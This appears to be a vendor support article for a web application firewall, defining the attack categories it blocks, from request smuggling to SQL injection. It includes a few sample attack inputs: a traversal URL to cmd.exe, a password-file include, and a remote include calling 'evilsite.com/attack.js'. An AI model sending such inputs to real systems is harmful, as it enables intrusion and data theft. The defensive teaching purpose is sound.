Follow

Q&A: What are the definitions of attack types?

 

Question

  • Attack Types
  • definition of each block event by attack types

 

Environment

  • Silverline WAF 
  • WAF Policy

 

Answer

==============================
HTTP Parser Attack:
HTTP parser attacks attempt to execute malicious code, extract information, or enact Denial of Service by targeting the HTTP parser directly.
------------------------------
*This is a general term.  Examples include but are not exclusive to:
1. Cookies that are not RFC compliant
2. Bad multipart/form-data request parsing
3. Content length defined as a value <=0
4. Maximum number of HTTP headers exceeded
==============================
HTTP Request Smuggling Attack:
HTTP Request Smuggling attacks attempt to encapsulate one request within another request through a web proxy.
------------------------------
*This is a general term.  Examples include but are not exclusive to:
1. POST request with Content-Length: 0
2. Several Content-Length headers
==============================
Detection Evasion:
Detection evasion is an attack technique that attempts to disguise or hide an attack to avoid detection by an attack signature.
------------------------------
*This is a general term.  Examples include but are not exclusive to:
1. Illegal repeated parameter names
2. The URI or parameter values are encoded multiple times
3. ASCII bytes higher than 127
==============================
Predictable Resource Location:
Predictable resource location is an attack technique used to uncover hidden website content and functionality.
------------------------------
*This is generally a subset of 'Forceful Browsing'.  Examples include but are not exclusive to:
1. GET http://example.com/admin/; where /admin/ is a common location for administrative functions and should not be accessed during standard application usage.
2. File-extension amendments; where maybe a site legitimately has https://example.com/log and attackers will try to GET https://example.com/log.bak
==============================
Non-browser Client:
Non Browser Client attacks use crawlers or other scripts to simulate human activity.
------------------------------
*The client application is typically determined via the 'User-Agent' HTTP header.  Although this is the most commonly used methodology, there are other methods of fingerprinting a client.
Example of a proper browser User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Example of a non-browser User-Agent: curl/7.21.4 (universal-apple-darwin11.0) libcurl/7.2
==============================
Forceful Browsing:
Forceful Browsing attacks attempt to access data outside the specific access schema of the application.
------------------------------
*This is a general term.  It is when a client is identified to be traveling through an application in a non-standard path.  So, a normal user (for example) would first got to https://example.com/login and then go to https://example.com/job-list.  This would indicate that the user first logged in, and then looked at the job list.  However, if you see a session where someone GETs https://example.com/job-list for their first transaction, and never visited the login-page, then you know they typed in that URL manually and did not access it from the usual button or link presented after login.
==============================
Information Leakage:
Information leakage is when a website reveals sensitive data, such as developer comments or error messages, which may aid an attacker in exploiting the system.
------------------------------
*This is a general term.  Examples include but are not exclusive to:
1. Sometimes developers leave comments in their code that may indicate resource paths to resources unintended for standard use, or account passwords.
2. Enumeration can occur if you trick the system into throwing informative errors:
 The following was returned when placing an apostrophe into the username field of a login page. Improper server configurations:

An Error Has Occurred.
    Error Message:
  System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression 'username = ''' and password = 'g''. at
  System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling ( Int32 hr) at
  System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult ( tagDBPARAMS dbParams,  Object& executeResult) at
==============================
Path Traversal:
The path traversal attack technique forces access to files, directories, and commands that potentially reside outside the web document root directory.
------------------------------
*OWASP: By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

*In UNIX and Windows environments, directories contain a hidden logical directory called ".." This directory takes you one step up.  For example; if you are currently in /directory0/directory1/ and you type .. it will take you to /directory0/

So, in a web-app if you are currently in https://example.com/users/Jon_Wayman/confidential and you tried to do a GET for https://example.com/users/Jon_Wayman/confidential/../../Manny_Cadiz/confidential/ you are effectively calling for https://example.com/users/Manny_Cadiz/confidential/
==============================
Denial of Service:
Denial of service (DoS) is an attack technique that overwhelms system resources to prevent a web site from serving normal user activity.
------------------------------
*This is a general term.  Examples include but are not exclusive to:
1. Using hundreds of machines in a botnet to simply blow tons of garbage packets at the target, like ICMP-pings or DNS reflections, etc.
2. Sending a crafted command to an application that is known to cause the target system to have to use excessive resources to process.
*Abstract: Imagine being at the grocery store, and most people use a debit-card+PIN to pay... the line moves pretty fast.  Now, imagine a single customer writing out a paper-check and waiting on it to clear... this is slower and takes up more resources (time) of the cashier.  Now, imagine someone paying 100 people to go into a grocery store and pay with paper-checks... this is an example of a denial of service attack on a grocery store.
==============================
Session Hijacking:
Session hijacking attacks attempt to hijack a valid extant user session.
------------------------------
* OWASP describes it best here: https://www.owasp.org/index.php/Session_hijacking_attack
* It is when your session variable gets intercepted and an attacker tries to re-initiate that same session using your session information.  There are also examples of these types of attacks being performed using cookie information.
==============================
Command Execution:
Command execution attacks is when an attacker manipulates the data for a user-input field by submitting commands with the intent of altering the web page content or web application, with the intent of executing a shell command on a remote server to reveal sensitive data for example, a list of users on a server.
------------------------------
*On a windows machine you can start the command line by running cmd.exe. So, an example would be if someone submits https://example.com/%5c../%5c../%5c../%5c../%5c/Windows/%5c/System32/%5c/cmd.exe. The attacker would receive a prompt for the command shell on the target system.
==============================
Server Side Code Injection:
Server side code injection attempts to exploit weakness in applications and services to force those services to execute malicious code.
------------------------------
*This is a general term.  Examples include but are not exclusive to:
1. SQL Injection
2. Command Injection
3. X-Path Injection (XML)
==============================
Trojan/Backdoor/Spyware:
Attackers use Trojan horse, backdoor, and spyware attacks to try to circumvent a web servers or web applications built-in security by masking the attack within a legitimate communication. For example, an attacker may include an attack in an email or Microsoft Word document, and when a user opens the email or document, the attack launches.
------------------------------
*This is a general term.  Examples include but are not exclusive to:
SEE: https://uk.norton.com/norton-blog/2016/02/the_8_most_famousco.html
SEE: https://usa.kaspersky.com/resource-center/threats/trojans
==============================
Injection Attempt:
Injection Attempt attacks exploit weakness in various other applications in order to inject and/or execute malicious code.
------------------------------
*This is a general term.  Examples include but are not exclusive to:
1. SQL Injection
2. Command Injection
3. X-Path Injection (XML)
==============================
Remote File Include:
Remote file location attacks attempt to exploit web applications that may retrieve and execute the code included in remote files.
------------------------------
*An attack targeting vulnerabilities in web applications that dynamically reference external scripts. The perpetrator’s goal is to exploit the referencing function in an application to upload malware (e.g., backdoor shells) from a remote URL located within a different domain.
1. 1. A JSP page contains this line of code: <jsp:include page=”<%=(String)request.getParmeter(“ParamName”)%>”> can be manipulated with the following request: Page1.jsp?ParamName=/WEB-INF/DB/password.  Processing the request reveals the content of the password file to the perpetrator.
2. 2. A web application has an import statement that requests content from a URL address, as shown here: <c:import url=”<=request.getParameter(“conf”)%>”>.  If unsanitised, the same statement can be used for malware injection.
For example: Page2.jsp?conf=https://evilsite.com/attack.js.
==============================
Vulnerability Scan:
A vulnerability scan is an attack technique that uses an automated security program to probe a web application for software vulnerabilities.
------------------------------
Examples of vuln-scanners: Open-VAS, Nessus, Nexpose
*Typically these types of scans can be identified by catching a series of requests to your server that tend to be in a linear order, or a series of known exploits being thrown at the target in quick succession.
==============================
Buffer Overflow:
Buffer overflow exploits are attacks that alter the flow on an application by overwriting parts of memory.
------------------------------
SEE: https://www.owasp.org/index.php/Buffer_Overflows
*Basically it is when an attacker sends a set of data to the application that exceeds the expected data-size.  If left unsanitised this can allow for one application to crawl over into another section of memory that was never intended to be accessed during standard application use.
==============================
Cross Site Scripting (XSS):
Cross-site scripting (XSS) is an attack technique that forces a website to echo attacker-supplied executable code, which loads in a user's browser.
------------------------------
SEE: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
*This is a general term, to understand the different types...
SEE: https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting
==============================
HTTP Response Splitting:
HTTP Response Splitting attacks attempt to manipulate the server to inject a CR/LF sequence in its response headers.
------------------------------
CR and LF are ASCII and Unicode control characters while \r and \n are abstractions used in certain programming languages.  They mean Carrier Return and Line Feed.
SEE: https://www.owasp.org/index.php/HTTP_Response_Splitting
==============================
LDAP Injection:
LDAP injection is an attack technique used to exploit web sites that construct LDAP statements from user-supplied input.
------------------------------
LDAP, Lightweight Directory Access Protocol, is an Internet protocol that email and other programs use to look up information from a server containing an LDAP database.
*LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it’s possible to modify LDAP statements using a local proxy. This could result in the execution of arbitrary commands such as granting permissions to unauthorized queries, and content modification inside the LDAP tree.
SEE: https://www.owasp.org/index.php/LDAP_Injection_Prevention_Cheat_Sheet
==============================
SQL-Injection:
SQL Injection is an attack technique used to exploit websites that construct SQL statements from user-supplied input.
------------------------------
SEE: https://www.owasp.org/index.php/SQL_Injection
*This is a pretty extensive topic, with many examples.  Typically you either trick the interpreter into thinking you sent a statement that is always true (1=1), or that a remark statement is hit (#), or cause a syntax fault (').  You can then couple this with data requests to extract passwords, and other forms of sensitive data (depending on what data is stored in the SQL-database.
==============================
XPath Injection:
XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
------------------------------
SEE: https://www.owasp.org/index.php/XPATH_Injection
==============================
Other application activity/attack

This attack category represents attacks that do not fit into the more explicit attack classifications.

 

 

 

 

Related Content

Was this article helpful?
1 out of 1 found this helpful
Have more questions? Submit a request